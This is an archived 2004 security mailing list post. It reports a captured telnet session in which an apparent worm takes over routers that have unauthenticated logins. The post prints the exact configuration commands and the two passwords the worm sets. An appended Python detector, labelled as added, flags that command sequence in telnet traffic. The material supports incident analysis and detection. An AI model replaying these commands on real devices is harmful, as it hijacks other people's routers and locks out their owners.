Security Incidents mailing list archives

Re: Strange authentication attempts


From: John Narron <zeek () cdsinet net>
Date: 31 Mar 2004 15:32:54 -0000

In-Reply-To: <20040330164153.5848.qmail () www securityfocus com>

I've gathered some new information regarding this incident.

I've been watching port 23 coming in and out of my network and captured a session.  It appears to be some worm, trojan, 
or script that's seeking out a particular device that allows an unauthenticated login, then sets up a username and 
password and saves the configuration.  The commands are as follows:

config
system
password admin
13370n3z
13370n3z
password user
fawkoffsz
fawkoffsz
save

It appears to set up a user named 'admin' with a password of '13370n3z', and another user named 'user' with a password 
of 'fawkoffsz'.  I'm not sure what kind of device uses this sequence of commands, but I'm suspecting some sort of 
cable or DSL router (since a lot of those, still, come with unauthenticated logins).
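
Added example, not part of the original post: a Python sketch that checks the client side of a reassembled port 23 session for the command sequence reported above (config, system, one or more password changes typed twice, save) and returns the accounts that were reset. The function names and the sample byte streams are constructed for illustration, and the streams use placeholder passwords.

```python
import re

PASSWORD_CMD = re.compile(r"password\s+(\S+)")
IAC, SB, SE = 0xFF, 0xFA, 0xF0   # telnet command bytes (RFC 854)

def strip_telnet(raw: bytes) -> str:
    """Remove telnet option negotiation so only typed data remains."""
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] != IAC or i + 1 >= len(raw):
            out.append(raw[i]); i += 1
        elif raw[i + 1] == IAC:              # escaped 0xFF data byte
            out.append(IAC); i += 2
        elif raw[i + 1] == SB:               # subnegotiation runs to IAC SE
            end = raw.find(bytes([IAC, SE]), i + 2)
            i = len(raw) if end < 0 else end + 2
        elif 0xFB <= raw[i + 1] <= 0xFE:     # WILL/WONT/DO/DONT + option
            i += 3
        else:                                # other two-byte command
            i += 2
    return out.decode("ascii", errors="replace").replace("\x00", "")

def accounts_reset(client_stream: bytes) -> list:
    """Return account names set in a config/system/password.../save run."""
    lines = [l.strip() for l in strip_telnet(client_stream).splitlines()]
    lines = [l for l in lines if l]
    for start in range(len(lines) - 1):
        if lines[start:start + 2] != ["config", "system"]:
            continue
        i, accounts = start + 2, []
        while i + 2 < len(lines):
            m = PASSWORD_CMD.fullmatch(lines[i])
            # The new password is typed twice; both entries must match.
            if not m or lines[i + 1] != lines[i + 2]:
                break
            accounts.append(m.group(1))
            i += 3
        if accounts and i < len(lines) and lines[i] == "save":
            return accounts
    return []

# Constructed client-to-server byte streams (placeholder passwords).
SUSPECT = (b"\xff\xfd\x03\xff\xfb\x18" b"config\r\nsystem\r\n"
           b"password admin\r\nexample-pw-1\r\nexample-pw-1\r\n"
           b"password user\r\nexample-pw-2\r\nexample-pw-2\r\nsave\r\n")
BENIGN = b"config\r\nsystem\r\npassword admin\r\nabc\r\nabd\r\nexit\r\n"

if __name__ == "__main__":
    for name, stream in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, accounts_reset(stream))
```

A non-empty result means the session changed passwords and saved the configuration in one pass, which is worth correlating with whether the session ever saw a login prompt.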

